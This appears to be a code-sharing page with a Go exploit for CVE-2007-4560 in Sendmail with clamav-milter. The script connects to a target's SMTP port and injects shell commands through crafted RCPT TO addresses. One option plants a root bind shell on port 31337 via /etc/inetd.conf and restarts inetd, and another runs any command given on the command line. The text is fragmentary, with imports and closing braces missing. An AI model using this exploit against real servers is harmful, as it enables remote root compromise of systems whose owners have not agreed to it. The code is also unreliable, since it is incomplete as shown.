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Last active March 10, 2021 20:09
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[GO] ClamAV Milter Remote Code Execution [CVE-2007-4560]
package main
// Sendmail w/ clamav-milter Remote Root Exploit
// 'CVE-2007-4560'
// coded by :)
// go run exploit.go -h -p 25 -c "ping -c 5"
import (
func main(){
ip := flag.String("h", "", "Ip Address")
port := flag.String("p", "25", "Port")
bind := flag.Bool("b", false, "Spawn bind shell on target")
cmd := flag.String("c", "", "Use Command instead of bind shell")
conn, err := net.Dial("tcp", *ip + ":" + *port)
if err != nil{
log.Fatal("Connection error: ", err)
conn.Write([]byte("helo you\r\n"))
conn.Write([]byte("mail from: <>\r\n"))
if *bind {
conn.Write([]byte("rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n"))
conn.Write([]byte("rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n"))
conn.Write([]byte("rcpt to: <nobody+\"|" + *cmd +"\"@localhost>\r\n"))
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